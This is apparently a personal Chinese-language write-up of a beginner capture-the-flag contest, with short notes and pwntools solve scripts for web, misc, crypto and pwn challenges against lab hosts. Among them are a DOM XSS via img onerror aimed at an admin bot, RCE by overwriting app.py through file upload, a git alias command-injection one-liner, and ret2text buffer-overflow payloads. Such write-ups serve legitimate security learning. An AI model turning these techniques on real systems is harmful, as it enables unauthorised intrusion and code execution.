萌新賽 WP 只寫寫有意思的題吧
web#
babyjvav#
https://www.tritium.work/2023/11/06/JAVA 入門的坑 /
secchat#
這裡有一個插入 innerhtml 的 domxss 可以用 svg 標籤或者 img 的 onerror 觸發
注意到在發起聊天的時候 id 會調用這個 message 函數,就把 xss 構造進 id,發送給 admin,就能通過各種函數調用控制 admin 的行為了
大雪想考五百分#
。。我覺得這個題低能的很
daxue =new Proxy({
"math": "150",
"computer": new String("150"),
"politics": 98,
"english": 100,
"flag": 0,
value:500
}, {
get:function (target, prop, receiver) {
if (prop === 'politics') {
if (target.politics !== 100) {
return target.politics++;
} else {
return target.politics;
}
};
if(prop === "valueOf"){
return function() {
return target.value;
};
};
if (prop === 'english') {
if (target.english !== 100){
return "99";
}else {
return target.english++;
}
};
return Reflect.get(target, prop,receiver);
}
});
我新學的 flask#
利用任意文件上傳覆蓋 /src/app.py, 添加一個惡意路由,就能 rce 了
misc#
大雪樹鋸結構#
打 gitshell 的 考察一個很少用的點
git -c alias.test='!/readflag' test
用 alias 引入外部命令
內存取證#
用 vol 查看進程,dump 出 backdoor.exe, 讀就行了
3G 之前是什麼#
想考信息論,但是在 ctf 環境下肯定有一種歪路
while True:
r = remote("172.20.14.117",53001)
for i in range(15):
print(r.recvuntil(b"Ask Shannon:\n[-] "))
r.sendline(b"1")
r.recvuntil(b"Now open the chests:\n[-] ")
r.sendline(b'1 1 1 1 1 1 1')
res = r.recvline().decode()
if "You've found all the treas" in res:
print(res)
break
else:
print("next")
r.close()
continue
一共只有 128 種情況 一定很快就會出現全 1 的
crypto#
hard_pow#
打長度擴展攻擊 hashpumpy 裝不明白,用了一個平替
https://github.com/shellfeel/hash-ext-attack/tree/master
easy_pow#
用 brutehash 跑出來就行了 不用腳本
easy_dhke#
什麼東西都洩露了 都偷過來縫進 pwntools 裡
from Crypto.Util.number import * # type: ignore
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad,unpad
import string
import random
import os
from pwn import *
# p is a large prime number used for modulo operations in the Diffie-Hellman key exchange
p = 327824197795087630552811243153730025469
# g is the base used for generating public keys in the Diffie-Hellman key exchange
g = 5
# alice is Alice's private key, an integer chosen by Alice
alice = 22751
# bob is Bob's private key, an integer chosen by Bob
bob = 39494
# Bob calculates his public key as g^bob mod p and assigns it to Bob (uppercase to distinguish from private key)
Bob = pow(g, bob, p)
# The shared secret key is calculated by Alice using Bob's public key, raised to the power of Alice's private key mod p
key = long_to_bytes(pow(Bob, alice, p))
def encrypt(plain_text: bytes, key: bytes) -> bytes:
cipher = AES.new(key, AES.MODE_ECB)
cipher_text = cipher.encrypt(pad(plain_text, AES.block_size))
return cipher_text
def decrypt(encrypt_text: bytes, key: bytes) -> bytes:
cipher = AES.new(key, AES.MODE_ECB)
plain_text = unpad(cipher.decrypt(encrypt_text), AES.block_size)
return plain_text
r = remote('172.20.14.117',40766)
r.recvuntil(b'[+] Alice said :\n')
cipher = r.recvuntil(b'\n')[0:-1]
print(cipher)
message = decrypt(cipher, key)
print(message)
r.recvuntil(b"[+] Now tell me what are they talking about:")
r.sendline(message)
r.recvuntil(b"[+] Tell me the cipher:")
r.send(encrypt(b'HackedBy0xfa',key))
print(r.recvall())
easy_rsa#
這個題的 n 實在簡單,直接去 factordb 分解出來就能解密了
leak_d#
你都知道 d 了 直接解密不就行了
腳本好像被我刪了
pwn#
right#
自己研究出來了這個,ctfwiki 上最簡單的 ret2text
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
r = remote("172.20.14.117",28202)
addr = 0x40115A
payload = flat([b'a'*0x28,addr])
r.recvuntil(b'so please tell me what you want to tell me\n')
# print(payload)
r.sendline(payload)
# r.sendline(b'ls')
r.interactive()
# print(r.recvline())
addr 是 system 那一行的地址,rbp-20h+8 覆蓋到堆疊頂部
onepiece#
from pwn import *
io=remote("172.20.14.117",61768)
addr = 0x40119e
payload=b"a"*0x100+p64(addr)*0x100
io.sendline(payload)
io.interactive()
亂出的 我是看不明白 blindpwn